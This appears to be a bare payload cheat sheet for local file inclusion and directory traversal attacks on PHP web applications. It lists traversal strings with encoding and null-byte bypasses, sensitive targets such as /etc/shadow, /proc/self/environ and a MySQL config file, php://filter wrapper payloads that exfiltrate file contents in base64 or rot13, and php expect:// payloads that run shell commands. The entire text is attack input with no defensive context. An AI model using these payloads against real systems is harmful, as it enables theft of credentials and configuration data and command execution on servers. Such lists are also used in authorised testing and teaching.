/etc/passwd
etc/passwd%00
../../../../../../../../etc/passwd
%252e%252e%252f
....//....//etc/passwd

Interesting files to check out :

/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/proc/[0-9]*/fd/[0-9]*
/proc/self/environ
/proc/version
/proc/cmdline

Wrappers 

php://filter/convert.base64-encode/resource=/etc/passwd
pHp://FilTer/convert.base64-encode/resource=/etc/passwd
php://filter/read=string.rot13/resource=/etc/passwd
php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
php:expect://id
php:expect://ls
